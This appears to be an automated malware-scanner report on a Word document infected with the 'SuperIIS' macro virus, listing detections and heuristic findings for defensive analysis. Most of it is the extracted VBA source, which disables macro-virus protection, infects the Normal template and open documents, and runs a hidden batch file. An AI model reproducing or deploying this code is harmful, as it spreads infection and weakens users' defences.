MALICIOUS
Risk Score: 356
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This document contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of older malware. The VBA script attempts to locate the Windows directory, clean itself from the current document and the Normal template, and then save a new template file named 'lo.sys' to the system directory. This behavior suggests an attempt to establish persistence or modify the user's environment, likely as part of a larger malicious operation.
Heuristics 8
- ClamAV: Doc.Trojan.IIS-19 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.IIS-19
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  a = Shell(windir & "\System\lo.bat", 0)
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script:
  ActiveDocument.VBProject.VBComponents(t).CodeModule.deletelines 1, a
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Sub AutoOpen()
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script:
  FullCodeN = "Sub AutoClose()" & Chr(13)
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 49830 bytes |

SHA-256: 848b77e0f9bcedf85dfb1bb280239ba6bbf41e6c850a042ab14184877b536fb7
Detection: ClamAV: Doc.Trojan.IIS-11
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" Sub AutoOpen() On Error GoTo eb 'MyName=SuperIISv1.0 Call Flitnic eb: End Sub Sub ViewVbCode() On Error GoTo NoDoc Close #1 Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop Close #1 If windir = "" Then Exit Sub 'Clean Activedocument: ms = ActiveDocument.VBProject.VBComponents.Count For t = 1 To ms ls = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines If ls > 3 Then l = ActiveDocument.VBProject.VBComponents(t).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then Acd = 1 Exit For End If Next t a = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.countoflines ActiveDocument.VBProject.VBComponents(t).CodeModule.deletelines 1, a ActiveDocument.Saved = True ActiveDocument.Saved = True NoDoc: 'Clean NormalTemplate: ms = NormalTemplate.VBProject.VBComponents.Count For t2 = 2 To ms ls = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines If ls > 3 Then l = NormalTemplate.VBProject.VBComponents(t2).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then NormT = 1 Exit For End If Next t2 a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines l = "" On Error GoTo 0 On Error GoTo eb NormalTemplate.OpenAsDocument ActiveDocument.SaveAs FileName:=windir & "\System\lo.sys", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False a = Dir(NormalTemplate.FullName) If a = "" Then GoTo notemp If NormAt = True Then NormalTemplate.Saved = True End If notemp: a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.deletelines 1, a NormAt = False 
NormAt = ActiveDocument.ReadOnly ActiveDocument.Close a = Dir(windir & "\System\lo.bat") If a <> "" Then Kill windir & "\System\lo.bat" Close Open windir & "\System\lo.bat" For Append As #1 Print #1, ":Begin" l = Len(NormalTemplate.FullName) l = l - 10 Print #1, "If not exist " & Left(NormalTemplate.FullName, l) & "~$Normal.dot goto start" Print #1, "Goto Begin" Print #1, ":Start" Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Close #1 If NormAt = True Then GoTo NoBat a = Shell(windir & "\System\lo.bat", 0) NoBat: For i = 1 To 2 al = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents(t2).CodeModule.deletelines 1, al NormalTemplate.Saved = True Next i esub: eb: NormalTemplate.Saved = True Application.ShowVisualBasicEditor = True NoDocL: Options.SaveNormalPrompt = False NormalTemplate.Saved = True End Sub Sub ToolsMacro() On Error GoTo NoDoc 'Save ActiveDocument: ms = ActiveDocument.VBProject.VBComponents.Count For t = 1 To ms ls = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines If ls > 3 Then l = ActiveDocument.VBProject.VBComponents(t).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then Acd = 1 Exit For End If Next t If Acd = 1 Then FullCodeD = "Sub AutoOpen" & Chr(13) FullCodeN = "Sub AutoClose()" & Chr(13) a = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.countoflines For ii = 2 To a l = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.Lines(ii, 1) FullCodeN = FullCodeN & l & Chr(13) FullCodeD = FullCodeD & l & Chr(13) Next ii End If 'Clean Activedocument: a = 
ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines ActiveDocument.VBProject.VBComponents(t).CodeModule.deletelines 1, a ActiveDocument.Saved = True ActiveDocument.Saved = True NoDoc: 'Save NormalTemplate: ms = NormalTemplate.VBProject.VBComponents.Count For t2 = 1 To ms ls = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines If ls > 3 Then l = NormalTemplate.VBProject.VBComponents(t2).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then NormT = 1 Exit For End If Next t2 If NormT = 1 Then FullCodeD = "Sub AutoOpen()" & Chr(13) FullCodeN = "Sub AutoClose()" & Chr(13) a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines For iiii = 2 To a l = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.Lines(iiii, 1) FullCodeD = FullCodeD & l & Chr(13) FullCodeN = FullCodeN & l & Chr(13) Next iiii End If 'Clean NormalTemplate: l = "" On Error GoTo 0 On Error GoTo eb a = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents(t2).CodeModule.deletelines 1, a NormalTemplate.Saved = True esub: Close #1 Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop Close #1 If windir = "" Then Exit Sub a = GetAttr(NormalTemplate.FullName) If a = 33 Then a = 1 If a = 1 Then GoTo eb eb: NormalTemplate.Saved = True Application.Dialogs(wdDialogToolsMacro).Show ReInf = True If Application.ShowVisualBasicEditor = True Then ReInf = False Reinfection: If ReInf = True Then 'Reinfection: Acd = 0 NormT = 0 If NormT <> 1 Then NormalTemplate.OpenAsDocument NormAt = ActiveDocument.ReadOnly ActiveDocument.Close Close #1 look: ms = NormalTemplate.VBProject.VBComponents.Count For inn = 2 To ms a = NormalTemplate.VBProject.VBComponents(inn).CodeModule.countoflines If a < 1 Then NormalTemplate.VBProject.VBComponents(inn).CodeModule.AddFromstring (FullCodeN) i = 20 Exit For End If Next inn If i <> 20 
Then Close #1 a = Dir(windir & "\System\Flitnic.drv") If a <> "" Then Kill windir & "\system\Flitnic.drv" Close #1 Open windir & "\System\Flitnic.drv" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close #1 NormalTemplate.VBProject.VBComponents.Import windir & "\System\Flitnic.drv" GoTo look End If a = Dir(NormalTemplate.FullName) If a = "" Then GoTo notemp If NormAt = True Then NormalTemplate.Saved = True End If End If i = 1 If NormAt <> True Then NormalTemplate.Save notemp: If Acd <> 1 Then Close look2: a = Application.Documents.Count If a < 1 Then GoTo NoDocL ms = ActiveDocument.VBProject.VBComponents.Count For inn2 = 2 To ms a = ActiveDocument.VBProject.VBComponents(inn2).CodeModule.countoflines If a < 1 Then ActiveDocument.VBProject.VBComponents(inn2).CodeModule.AddFromstring (FullCodeD) i = 20 Exit For End If Next inn2 If i <> 20 Then Close #1 a = Dir(windir & "\System\Flitnic.drv") If a <> "" Then Kill windir & "\system\Flitnic.drv" Close #1 Open windir & "\System\Flitnic.drv" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close #1 ActiveDocument.VBProject.VBComponents.Import windir & "\System\Flitnic.drv" GoTo look2 End If If UCase(Left(ActiveDocument.FullName, 1)) <> "A" And Mid(ActiveDocument.FullName, 3, 1) = "\" Then If ActiveDocument.ReadOnly = True Then GoTo noactsave ActiveDocument.Save noactsave: Else ActiveDocument.Saved = True End If End If NoDocL: Else a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.deletelines 1, a NormalTemplate.OpenAsDocument NormAt = False NormAt = ActiveDocument.ReadOnly ActiveDocument.Close a = Dir(windir & "\System\lo.bat") If a <> "" Then Kill windir & "\System\lo.bat" Close Open windir & "\System\lo.bat" For Append As #1 Print #1, ":Begin" l = Len(NormalTemplate.FullName) l = l - 10 Print #1, "If not exist " & Left(NormalTemplate.FullName, l) & "~$Normal.dot goto start" 
Print #1, "Goto Begin" Print #1, ":Start" Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Close #1 If NormAt = True Then GoTo NoBat a = Shell(windir & "\System\lo.bat", 0) NoBat: For i = 1 To 2 al = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents(t2).CodeModule.deletelines 1, al NormalTemplate.Saved = True Next i End If Options.SaveNormalPrompt = False NormalTemplate.Saved = True End Sub Sub Flitnic() Begin: On Error GoTo eb NormAt = False Options.VirusProtection = False Options.ConfirmConversions = False Options.SaveNormalPrompt = False Close #1 Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop If windir = "" Then Exit Sub On Error GoTo NoInf ms = ActiveDocument.VBProject.VBComponents.Count For t = 1 To ms ls = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines If ls > 3 Then l = ActiveDocument.VBProject.VBComponents(t).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then Acd = 1 Exit For End If Next t If Acd = 1 Then FullCodeN = "Sub AutoClose()" & Chr(13) a = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.countoflines For ii = 2 To a l = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.Lines(ii, 1) FullCodeN = FullCodeN & l & Chr(13) Next ii End If ms = NormalTemplate.VBProject.VBComponents.Count For t2 = 1 To ms ls = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines If ls > 3 Then l = NormalTemplate.VBProject.VBComponents(t2).CodeModule.Lines(3, 
1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then NormT = 1 Exit For End If Next t2 If NormT = 1 Then FullCodeD = "Sub AutoOpen()" & Chr(13) a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines For iiii = 2 To a l = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.Lines(iiii, 1) FullCodeD = FullCodeD & l & Chr(13) Next iiii End If If NormT <> 1 Then a = Dir(windir & "\System\lo.sys") If a <> "" Then Kill windir & "\System\lo.sys" NormalTemplate.OpenAsDocument NormAt = ActiveDocument.ReadOnly ActiveDocument.Close Close #1 look: ms = NormalTemplate.VBProject.VBComponents.Count For inn = 2 To ms a = NormalTemplate.VBProject.VBComponents(inn).CodeModule.countoflines If a < 1 Then NormalTemplate.VBProject.VBComponents(inn).CodeModule.AddFromstring (FullCodeN) i = 20 Exit For End If Next inn If i <> 20 Then Close #1 a = Dir(windir & "\System\Flitnic.drv") If a <> "" Then Kill windir & "\system\Flitnic.drv" Close #1 Open windir & "\System\Flitnic.drv" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close #1 NormalTemplate.VBProject.VBComponents.Import windir & "\System\Flitnic.drv" GoTo look End If a = Dir(NormalTemplate.FullName) If a = "" Then GoTo notemp If NormAt = True Then NormalTemplate.Saved = True End If notemp: End If i = 1 If Acd <> 1 Then Close look2: ms = ActiveDocument.VBProject.VBComponents.Count For inn2 = 2 To ms a = ActiveDocument.VBProject.VBComponents(inn2).CodeModule.countoflines If a < 1 Then ActiveDocument.VBProject.VBComponents(inn2).CodeModule.AddFromstring (FullCodeD) i = 20 Exit For End If Next inn2 If i <> 20 Then Close #1 a = Dir(windir & "\System\Flitnic.drv") If a <> "" Then Kill windir & "\system\Flitnic.drv" Close #1 Open windir & "\System\Flitnic.drv" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close #1 ActiveDocument.VBProject.VBComponents.Import windir & "\System\Flitnic.drv" GoTo look2 End If If UCase(Left(ActiveDocument.FullName, 1)) <> "A" 
And Mid(ActiveDocument.FullName, 3, 1) = "\" Then If ActiveDocument.ReadOnly = True Then GoTo noactsave ActiveDocument.Save noactsave: Else ActiveDocument.Saved = True End If End If NoInf: eb: d = Dir(NormalTemplate.FullName) If d = "" Then Exit Sub If NormAt = True Then SetAttr (NormalTemplate.FullName), vbNormal Else NormalTemplate.Save End If 'First ever used this kind of Stealth 'Written by Flitnic. I haven't yet included a payload! End Sub